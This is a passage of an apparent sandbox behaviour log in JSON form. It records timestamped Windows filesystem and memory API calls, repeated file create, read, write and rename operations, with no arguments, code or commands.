{"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,047", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,047", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,047", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,057", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,057", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,067", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,067", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,077", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,077", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,077", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,087", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,097", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,097", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,097", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,107", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,107", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,117", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,117", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,127", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,127", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,127", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,137", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,157", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,157", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,157", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,167", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,167", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,177", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,177", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,187", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,187", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,197", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,207", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,217", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,217", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,227", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,237", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,237", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,247", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,257", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,257", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,267", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,277", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,287", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,287", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,297", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,297", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 